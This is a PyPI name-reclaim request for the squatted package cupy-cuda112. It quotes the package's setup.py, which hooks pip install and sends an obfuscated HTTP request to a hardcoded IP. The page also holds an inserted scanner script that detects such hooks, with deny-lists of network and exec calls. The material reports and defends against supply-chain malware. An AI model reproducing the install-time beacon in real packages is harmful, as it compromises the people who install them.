PEP 541 Request: cupy-cuda112 #923

@kmaehashi

Description

Project to be claimed

cupy-cuda112: https://pypi.org/project/cupy-cuda112

Your PyPI username

kmaehashi: https://pypi.org/user/kmaehashi

Reasons for the request

I believe this project can be considered one of the "Invalid projects" specified in PEP 541. Specifically,

project is malware (designed to exploit or harm systems or users);

The project contains a setup.py file that sends a request to a malicious URL during installation.

import requests
from setuptools import setup
from setuptools.command.install import install


class CustomInstallCommand(install):
    # Runs during `pip install`; after the normal install step it builds the
    # URL from single-character literals and sends an HTTP GET to it.
    def run(self):
        install.run(self)
        url = "h"+"t"+"t"+"p"+":"+"/"+"/"+"1"+"0"+"1"+"."+"3"+"2"+"."+"9"+"9"+"."+"2"+"8"+"/name?cupy-cuda112"
        requests.get(url, timeout=30)

setup(
    name='cupy-cuda112',
    version='2.2.2',
    author='RemindSupplyChainRisks',
    author_email='RemindSupplyChainRisks@gmail.com',
    url='https://github.com/cupy-cuda112',
    description='Remind Supply Chain Risks',
    packages=['cupy-cuda112'],
    install_requires=['requests'],
    cmdclass={
        # Replaces the standard install command with the hook above
        'install': CustomInstallCommand,
    },
)

project is name squatting (package has no functionality or is empty);

The package only contains an __init__.py file, which says:

# the purpose is to make everyone pay attention to software supply chain attacks, because the risks are too great.

CuPy has been maintaining packages using the cupy-cudaXXX naming scheme for years. Obviously the intention is to squat the (future) package name.

Maintenance or replacement?

I would like to use the package name cupy-cuda112.

https://github.com/cupy/cupy

Contact and additional research

No email addresses or any contact information available for https://pypi.org/user/RemindSupplyChainRisks/.
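The setup.py quoted in this request shows the two patterns a reviewer should look for before installing an untrusted package: a `cmdclass` entry that hooks the `install` command (so arbitrary code runs at `pip install` time) and a network call whose target URL is assembled from single-character literals to defeat grepping. The following script is an added example, not part of the original request and not CuPy's or PyPI's code: it statically scans a `setup.py` with Python's `ast` module, folds `+`-chains of string literals back into the string they produce, and reports lifecycle hooks, command subclasses, and network or exec calls. The rule sets, the `MIN_PIECES` threshold, and the sample input (the excerpt above with the imports it would need) are my own assumptions.

```python
import ast
from typing import List, Optional, Tuple

Finding = Tuple[int, str, str]  # (line number, kind, detail)

# setuptools commands whose override runs code during `pip install` / `setup.py install`
HOOKED_COMMANDS = {"install", "develop", "egg_info", "build_py", "sdist"}
# Assumed deny-lists; a real scanner would use broader tables.
NETWORK_CALLS = {
    "requests.get", "requests.post", "urllib.request.urlopen",
    "socket.socket", "socket.create_connection", "http.client.HTTPConnection",
}
EXEC_CALLS = {"os.system", "subprocess.run", "subprocess.Popen", "subprocess.call",
              "subprocess.check_output", "eval", "exec"}
MIN_PIECES = 5  # a string glued together from this many literals is treated as obfuscated

# Constructed sample input: the setup.py excerpt from the request above, plus the
# imports it would need to run. Used here only as scanner input.
SAMPLE_SETUP_PY = '''
import requests
from setuptools import setup
from setuptools.command.install import install

class CustomInstallCommand(install):
    def run(self):
        install.run(self)
        url = "h"+"t"+"t"+"p"+":"+"/"+"/"+"1"+"0"+"1"+"."+"3"+"2"+"."+"9"+"9"+"."+"2"+"8"+"/name?cupy-cuda112"
        requests.get(url, timeout=30)

setup(
    name='cupy-cuda112',
    version='2.2.2',
    install_requires=['requests'],
    cmdclass={'install': CustomInstallCommand},
)
'''

# Constructed benign setup.py for comparison: no hooks, no network, no exec.
BENIGN_SETUP_PY = "from setuptools import setup\nsetup(name='example', version='1.0')\n"


def _dotted_name(node: ast.AST) -> Optional[str]:
    """Render a Name/Attribute chain such as `requests.get` as a dotted string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _fold_concat(node: ast.AST) -> Optional[Tuple[str, int]]:
    """Statically fold a chain of `+` over string literals into (value, piece count)."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value, 1
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = _fold_concat(node.left), _fold_concat(node.right)
        if left is not None and right is not None:
            return left[0] + right[0], left[1] + right[1]
    return None  # not a pure string-literal chain


class _SetupScanner(ast.NodeVisitor):
    def __init__(self) -> None:
        self.findings: List[Finding] = []

    def visit_ClassDef(self, node: ast.ClassDef) -> None:
        # `class X(install):` is the usual shape of an install-time hook
        for base in node.bases:
            name = _dotted_name(base)
            if name and name.split(".")[-1] in HOOKED_COMMANDS:
                self.findings.append((node.lineno, "command-subclass", name))
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:
        name = _dotted_name(node.func)
        if name in ("setup", "setuptools.setup"):
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    for key in kw.value.keys:
                        if isinstance(key, ast.Constant) and key.value in HOOKED_COMMANDS:
                            self.findings.append((node.lineno, "cmdclass-hook", key.value))
        elif name in NETWORK_CALLS:
            self.findings.append((node.lineno, "network-call", name))
        elif name in EXEC_CALLS:
            self.findings.append((node.lineno, "exec-call", name))
        self.generic_visit(node)

    def visit_BinOp(self, node: ast.BinOp) -> None:
        folded = _fold_concat(node)
        if folded is None:
            self.generic_visit(node)  # mixed expression: keep looking inside it
            return
        value, pieces = folded
        if pieces >= MIN_PIECES:
            self.findings.append((node.lineno, "obfuscated-string", value))
        # a fully folded chain has no sub-chains worth reporting separately


def scan_setup_py(source: str) -> List[Finding]:
    """Return suspicious patterns found in a setup.py source, in source order."""
    scanner = _SetupScanner()
    scanner.visit(ast.parse(source))
    return scanner.findings


if __name__ == "__main__":
    for lineno, kind, detail in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"line {lineno}: {kind}: {detail}")
```

On the sample above the scanner reports the `install` subclass, the folded URL (so the beacon host is visible even though it never appears as one literal in the file), the `requests.get` call, and the `cmdclass` hook; the benign setup.py produces no findings. A check like this belongs in a pre-install review of any package pulled from a name that could have been squatted, because none of these patterns are visible from the PyPI project page.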

Metadata

Labels

PEP 541, Package name support requests